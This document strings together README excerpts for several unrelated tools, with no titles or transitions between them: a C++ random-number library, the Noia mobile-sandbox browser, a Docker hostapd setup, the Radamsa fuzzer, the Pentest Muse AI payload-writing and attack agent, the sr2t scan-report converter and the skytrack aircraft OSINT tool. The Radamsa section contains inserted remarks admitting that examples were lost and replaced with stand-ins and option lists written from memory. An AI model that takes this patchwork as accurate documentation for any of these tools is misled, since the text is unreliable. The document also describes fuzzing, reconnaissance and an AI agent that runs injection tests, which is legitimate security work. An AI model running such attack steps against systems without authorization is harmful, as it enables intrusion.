This library was developed to combat insecure methods of storing random data in modern C++ containers, such as old and clunky PRNGs. rrgen instead uses the STL's distribution engines to efficiently and safely store a random number distribution in a given C++ container.
Installation
1) git clone https://github.com/josh0xA/rrgen.git
2) cd rrgen
3) make
4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.
#include "rrgen.hpp"
#include <iostream>
#include <vector>
#include <list>

int main(void)
{
    // Example usage for rrgen vector
    rrgen::rrand<float, std::vector, 10> rrvec;
    rrvec.gen_rrvector(false, true, 0, 10);
    for (auto &i : rrvec.contents()) { std::cout << i << " "; }
    // ^ the same as rrvec.show_contents()

    // Example usage for rrgen list (frontside insertion)
    rrgen::rrand<int, std::list, 10> rrlist;
    rrlist.gen_rrlist(false, true, "fside", 5, 25);
    std::cout << '\n';
    rrlist.show_contents();
    std::cout << "Size: " << rrlist.contents().size() << '\n';

    // Example usage for rrgen array
    rrgen::rrand_array<int, 5> rrarr;
    rrarr.gen_rrarray(false, true, 5, 35);
    for (auto &i : rrarr.contents()) { std::cout << i << " "; }
    // ^ the same as rrarr.show_contents()

    // Example usage for rrgen stack
    rrgen::rrand_stack<float, 10> rrstack;
    rrstack.gen_rrstack(false, true, 200, 1000);
    for (auto m = rrstack.xsize(); m > 0; m--) {
        std::cout << rrstack.grab_top() << " ";
        rrstack.pop_off();
        if (m == 1) { std::cout << '\n'; }
    }
}
Note: This is a transferred repository from a completely unrelated project.
Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications' sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.
Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, and open an issue if you find any problems. PRs are welcome.
Installation & Usage
npm install -g noia
noia
Features
Explore third-party applications' files and directories. Noia shows you details including the access permissions, file type and much more.
View custom binary files. Directly preview SQLite databases, images, and more.
Search application by name.
Search files and directories by name.
Navigate to a custom directory using the ctrl+g shortcut.
Download the application files and directories for further analysis.
You can customize the network password and other configurations in the files under confs/hostapd_confs/. You can also add your own hostapd configuration files here.
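For orientation, a typical WPA2 hostapd configuration (in the spirit of the wpa2.conf mounted in the examples below) looks roughly like this. The exact options shipped in confs/hostapd_confs/ may differ; treat the interface name, SSID and passphrase here as illustrative placeholders:

```
interface=wlan0
driver=nl80211
ssid=autowlan
hw_mode=g
channel=6
wpa=2
wpa_passphrase=ChangeMe123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
```

Changing wpa_passphrase here is what the paragraph above means by customizing the network password.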
Management using plain docker
Add --rm for volatile containers.
Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable, and it is easy to get up and running.
Nutshell:
$ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa
What the Fuzz
Programming is hard. All nontrivial programs have bugs in them. What's more, in some of the most widely used programming languages even the simplest typical mistakes are usually enough for attackers to gain undesired powers.
Fuzzing is one of the techniques to find such unexpected behavior in programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts to this process: getting the various kinds of inputs, and seeing what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs nothing bad happens.
There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.
Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there is a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.
Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Requirements
Supported operating systems:
* GNU/Linux
* OpenBSD
* FreeBSD
* Mac OS X
* Windows (using Cygwin)
Software requirements for building from sources:
* gcc / clang
* make
* git
* wget
Building Radamsa
$ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help
Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.
Fuzzing with Radamsa
This section assumes some familiarity with UNIX scripting.
Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.
Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.
In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.
$ echo "aaa" | radamsa
aaaa
Here radamsa decided to add one 'a' to the input. Let's try that again.
$ echo "aaa" | radamsa
Λaaa
Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.
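To illustrate the reproducibility claim, here is a small sketch. It assumes radamsa is on your PATH (and skips quietly otherwise); the seed value 7 is arbitrary:

```shell
# Same seed, same data: -s pins radamsa's random state.
if command -v radamsa >/dev/null 2>&1; then
  a=$(echo "aaa" | radamsa -s 7)
  b=$(echo "aaa" | radamsa -s 7)
  [ "$a" = "$b" ] && result="identical output for seed 7"
else
  result="radamsa not installed; skipping"  # graceful no-op without radamsa
fi
echo "$result"
```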
This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:
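The original example output did not survive; a minimal stand-in invocation (radamsa assumed on PATH, guarded so it degrades gracefully otherwise) would be:

```shell
# Generate three fuzzed variants of the same input in one run.
if command -v radamsa >/dev/null 2>&1; then
  out=$(echo "aaa" | radamsa -n 3)
else
  out="radamsa not installed; skipping"  # graceful no-op without radamsa
fi
echo "$out"
```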
Typically, however, one might want a separate run of the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:
$ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done
Notice that here we are giving the sample as a file instead of piping it into Radamsa. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output. This test will keep throwing fuzzed data at gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple, single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:
$ gzip -c /bin/bash > sample.gz
$ while true
do
  radamsa sample.gz > fuzzed.gz
  gzip -dc fuzzed.gz > /dev/null
  test $? -gt 127 && break
done
This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given on the command line), it is usually a good idea to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time, based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each output on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.
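The script itself did not survive extraction; a sketch under the stated assumptions (a samples/ directory of .bc files, radamsa and bc on PATH; the fuzz-%n.bc naming is illustrative) could look like:

```shell
# Hypothetical fuzz loop for bc: 100 fuzzed files per round, each fed to bc,
# stopping when bc dies of a fatal signal (exit status > 127).
# Guarded so it only runs when the tools and samples are actually present.
if command -v radamsa >/dev/null 2>&1 && command -v bc >/dev/null 2>&1 \
   && ls samples/*.bc >/dev/null 2>&1; then
  while true
  do
    radamsa -o fuzz-%n.bc -n 100 samples/*.bc
    for f in fuzz-*.bc
    do
      bc "$f" < /dev/null > /dev/null 2>&1
      test $? -gt 127 && { echo "fatal signal reproduced by $f"; break 2; }
    done
    rm -f fuzz-*.bc
  done
fi
done_msg="fuzz loop finished or skipped"
echo "$done_msg"
```

Note that the crashing file is kept on disk when the loop stops, so the failing input can be inspected afterwards.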
This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.
In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in the kernel and check if something new turns up in dmesg, run the program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
Output Options
The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:
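The list of patterns itself did not survive extraction. As a rough, unverified sketch from memory of radamsa's help text (treat every form below as an assumption and confirm with radamsa --help on your build):

```shell
# Assumed -o target forms; verify against your build's `radamsa --help`:
#   radamsa -o fuzzed-%n.bin -n 10 sample.bin   # numbered output files
#   radamsa -o :8080 -n inf sample.bin          # listen as a TCP server
#   radamsa -o 127.0.0.1:8080 -n inf sample.bin # connect as a TCP client
note="see radamsa --help for the authoritative pattern list"
echo "$note"
```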
A non-exhaustive list of related free tools:
* American fuzzy lop (http://lcamtuf.coredump.cx/afl/)
* Zzuf (http://caca.zoy.org/wiki/zzuf)
* Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)
* Peach (http://peachfuzzer.com/)
* Sulley (http://code.google.com/p/sulley/)
Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up, general purpose shotgun test that exposes the easiest (and often severe, due to being reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.
Some Known Results
A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test runs, both to assess the usefulness of the tool and to help improve the robustness of the target programs. For the test runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.
The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and by other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.
We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.
Thanks
The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.
Darkkey
Branden Archer
Troubleshooting
Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.
You can also drop by at #radamsa on Freenode if you have questions or feedback.
Issues in your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day), chances are that others will too.
Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.
FAQ
Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.
Q: Will you make a graphical version of radamsa?
A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.
Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use it from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions on this page.

Q: Radamsa does not compile using the instructions on this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or ask on IRC (#radamsa on freenode).

Q: I used fuzzer X and found many more bugs from program Y than Radamsa did.
A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish into radamsa if it's general purpose enough. It'd also be useful to get the samples you used, to check how well radamsa does, because it might be overfitting some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track of which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future-proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.
Warnings
Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things happening. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before it is tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.
Not safe when used as prescribed.
This product may contain faint traces of parentheses.
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
Pentest Muse Web App
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, making it a good AI assistant for your pentesting jobs.
Disclaimer
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
Requirements
Python 3.12 or later
Necessary Python packages as listed in requirements.txt
Setup
Standard Setup
Clone the repository:
git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse
Install the required packages:
pip install -r requirements.txt
Alternative Setup (Package Installation)
Install Pentest Muse as a Python Package:
pip install .
Running the Application
Chat Mode (Default)
In chat mode, you can chat with Pentest Muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
Agent Mode (Experimental)
You can also give Pentest Muse more control by asking it to take actions for you with agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:
python run_app.py agent
or
pmuse agent
Selection of Language Models
Managed APIs
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.
OpenAI API keys
Alternatively, you can choose to use your own OpenAI API key. To do this, simply add the argument --openai-api-key=[your openai api key] when starting the program.
Contact
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.
This tool takes a scanning tool's output file and converts it to a tabular format (CSV, XLSX, or a text table). It can process output from the following tools:
Nmap (XML);
Nessus (XML);
Nikto (XML);
Dirble (XML);
Testssl (JSON);
Fortify (FPR).
Rationale
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Dependencies
argparse (dev-python/argparse);
prettytable (dev-python/prettytable);
python (dev-lang/python);
xlsxwriter (dev-python/xlsxwriter).
Install
Using Pip:
pip install --user sr2t
Usage
You can use sr2t in two ways:
When installed as a package, call the installed script: sr2t --help.
When Git-cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help.
optional arguments:
  -h, --help            show this help message and exit
  --nmap-state NMAP_STATE
                        Specify the desired state to filter (e.g. open|filtered).
  --nmap-services       Specify to output a supplemental list of detected services.
  --no-nessus-autoclassify
                        Specify to not autoclassify Nessus results.
  --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
                        Specify to override a custom Nessus autoclassify YAML file.
  --nessus-tls-file NESSUS_TLS_FILE
                        Specify to override a custom Nessus TLS findings YAML file.
  --nessus-x509-file NESSUS_X509_FILE
                        Specify to override a custom Nessus X.509 findings YAML file.
  --nessus-http-file NESSUS_HTTP_FILE
                        Specify to override a custom Nessus HTTP findings YAML file.
  --nessus-smb-file NESSUS_SMB_FILE
                        Specify to override a custom Nessus SMB findings YAML file.
  --nessus-rdp-file NESSUS_RDP_FILE
                        Specify to override a custom Nessus RDP findings YAML file.
  --nessus-ssh-file NESSUS_SSH_FILE
                        Specify to override a custom Nessus SSH findings YAML file.
  --nessus-min-severity NESSUS_MIN_SEVERITY
                        Specify the minimum severity to output (e.g. 1).
  --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
                        Specify the width of the pluginid column (e.g. 30).
  --nessus-sort-by NESSUS_SORT_BY
                        Specify to sort output by ip-address, port, plugin-id,
                        plugin-name or severity.
  --nikto-description-width NIKTO_DESCRIPTION_WIDTH
                        Specify the width of the description column (e.g. 30).
  --fortify-details     Specify to include the Fortify abstracts, explanations
                        and recommendations for each vulnerability.
  --annotation-width ANNOTATION_WIDTH
                        Specify the width of the annotation column (e.g. 30).
  -oC OUTPUT_CSV, --output-csv OUTPUT_CSV
                        Specify the output CSV basename (e.g. output).
  -oT OUTPUT_TXT, --output-txt OUTPUT_TXT
                        Specify the output TXT file (e.g. output.txt).
  -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
                        Specify the output XLSX file (e.g. output.xlsx).
                        Only for Nessus at the moment.
  -oA OUTPUT_ALL, --output-all OUTPUT_ALL
                        Specify the output basename to output to all formats
                        (e.g. output).
specify at least one:
  --nessus NESSUS [NESSUS ...]
                        Specify (multiple) Nessus XML files.
  --nmap NMAP [NMAP ...]
                        Specify (multiple) Nmap XML files.
  --nikto NIKTO [NIKTO ...]
                        Specify (multiple) Nikto XML files.
  --dirble DIRBLE [DIRBLE ...]
                        Specify (multiple) Dirble XML files.
  --testssl TESTSSL [TESTSSL ...]
                        Specify (multiple) Testssl JSON files.
  --fortify FORTIFY [FORTIFY ...]
                        Specify (multiple) HP Fortify FPR files.
$ sr2t --nessus example/nessus.nessus
+---------------+------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host          | port | plugin id | plugin name                                                                 | severity | annotations |
+---------------+------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873     | SSL Medium Strength Cipher Suites Supported (SWEET32)                       | 2        | X           |
| 192.168.142.4 | 443  | 42873     | SSL Medium Strength Cipher Suites Supported (SWEET32)                       | 2        | X           |
| 192.168.142.4 | 3389 | 18405     | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2        | X           |
| 192.168.142.4 | 3389 | 30218     | Terminal Services Encryption Level is not FIPS-140 Compliant                | 1        | X           |
| 192.168.142.4 | 3389 | 57690     | Terminal Services Encryption Level is Medium or Low                         | 2        | X           |
| 192.168.142.4 | 3389 | 58453     | Terminal Services Doesn't Use Network Level Authentication (NLA) Only       | 2        | X           |
| 192.168.142.4 | 3389 | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.4 | 443  | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.4 | 3389 | 35291     | SSL Certificate Signed Using Weak Hashing Algorithm                         | 2        | X           |
| 192.168.142.4 | 3389 | 57582     | SSL Self-Signed Certificate                                                 | 2        | X           |
| 192.168.142.4 | 3389 | 51192     | SSL Certificate Cannot Be Trusted                                           | 2        | X           |
| 192.168.142.2 | 3389 | 42873     | SSL Medium Strength Cipher Suites Supported (SWEET32)                       | 2        | X           |
| 192.168.142.2 | 443  | 42873     | SSL Medium Strength Cipher Suites Supported (SWEET32)                       | 2        | X           |
| 192.168.142.2 | 3389 | 18405     | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2        | X           |
| 192.168.142.2 | 3389 | 30218     | Terminal Services Encryption Level is not FIPS-140 Compliant                | 1        | X           |
| 192.168.142.2 | 3389 | 57690     | Terminal Services Encryption Level is Medium or Low                         | 2        | X           |
| 192.168.142.2 | 3389 | 58453     | Terminal Services Doesn't Use Network Level Authentication (NLA) Only       | 2        | X           |
| 192.168.142.2 | 3389 | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.2 | 443  | 45411     | SSL Certificate with Wrong Hostname                                         | 2        | X           |
| 192.168.142.2 | 3389 | 35291     | SSL Certificate Signed Using Weak Hashing Algorithm                         | 2        | X           |
| 192.168.142.2 | 3389 | 57582     | SSL Self-Signed Certificate                                                 | 2        | X           |
| 192.168.142.2 | 3389 | 51192     | SSL Certificate Cannot Be Trusted                                           | 2        | X           |
| 192.168.142.2 | 445  | 57608     | SMB Signing not required                                                    | 2        | X           |
+---------------+------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X
Nmap
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
|                 | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78   | X  |    | X  | X   | X   | X   | X   | X    |      |      |
| 192.168.27.243  |    |    |    | X   | X   |     | X   | X    | X    | X    |
| 192.168.99.164  |    |    |    | X   | X   |     | X   | X    | X    | X    |
| 192.168.228.211 |    | X  |    |     |     |     |     |      |      |      |
| 192.168.171.74  |    |    |    | X   | X   |     | X   | X    | X    | X    |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address      | port | proto | service       | state |
+-----------------+------+-------+---------------+-------+
| 192.168.23.78   | 53   | tcp   | domain        | open  |
| 192.168.23.78   | 88   | tcp   | kerberos-sec  | open  |
| 192.168.23.78   | 135  | tcp   | msrpc         | open  |
| 192.168.23.78   | 139  | tcp   | netbios-ssn   | open  |
| 192.168.23.78   | 389  | tcp   | ldap          | open  |
| 192.168.23.78   | 445  | tcp   | microsoft-ds  | open  |
| 192.168.23.78   | 3389 | tcp   | ms-wbt-server | open  |
| 192.168.27.243  | 135  | tcp   | msrpc         | open  |
| 192.168.27.243  | 139  | tcp   | netbios-ssn   | open  |
| 192.168.27.243  | 445  | tcp   | microsoft-ds  | open  |
| 192.168.27.243  | 3389 | tcp   | ms-wbt-server | open  |
| 192.168.27.243  | 5800 | tcp   | vnc-http      | open  |
| 192.168.27.243  | 5900 | tcp   | vnc           | open  |
| 192.168.99.164  | 135  | tcp   | msrpc         | open  |
| 192.168.99.164  | 139  | tcp   | netbios-ssn   | open  |
| 192.168.99.164  | 445  | tcp   | microsoft-ds  | open  |
| 192.168.99.164  | 3389 | tcp   | ms-wbt-server | open  |
| 192.168.99.164  | 5800 | tcp   | vnc-http      | open  |
| 192.168.99.164  | 5900 | tcp   | vnc           | open  |
| 192.168.228.211 | 80   | tcp   | http          | open  |
| 192.168.171.74  | 135  | tcp   | msrpc         | open  |
| 192.168.171.74  | 139  | tcp   | netbios-ssn   | open  |
| 192.168.171.74  | 445  | tcp   | microsoft-ds  | open  |
| 192.168.171.74  | 3389 | tcp   | ms-wbt-server | open  |
| 192.168.171.74  | 5800 | tcp   | vnc-http      | open  |
| 192.168.171.74  | 5900 | tcp   | vnc           | open  |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip      | target hostname | target port | description                                                                      | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10  | 80          | The anti-clickjacking X-Frame-Options header is not present.                     | X           |
| 192.168.178.10 | 192.168.178.10  | 80          | The X-XSS-Protection header is not defined. This header can hint to the user     | X           |
|                |                 |             | agent to protect against some forms of XSS                                       |             |
| 192.168.178.10 | 192.168.178.10  | 80          | The X-Content-Type-Options header is not set. This could allow the user agent to | X           |
|                |                 |             | render the content of the site in a different fashion to the MIME type           |             |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
```
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type",X
```
```
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address                        | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443  | X      | X       | X      | X          | X   | X       | X       | X        |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
```
Or to output a CSV file:
```
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
```
skytrack is a command-line plane-spotting and aircraft OSINT reconnaissance tool written in Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general-purpose reconnaissance.
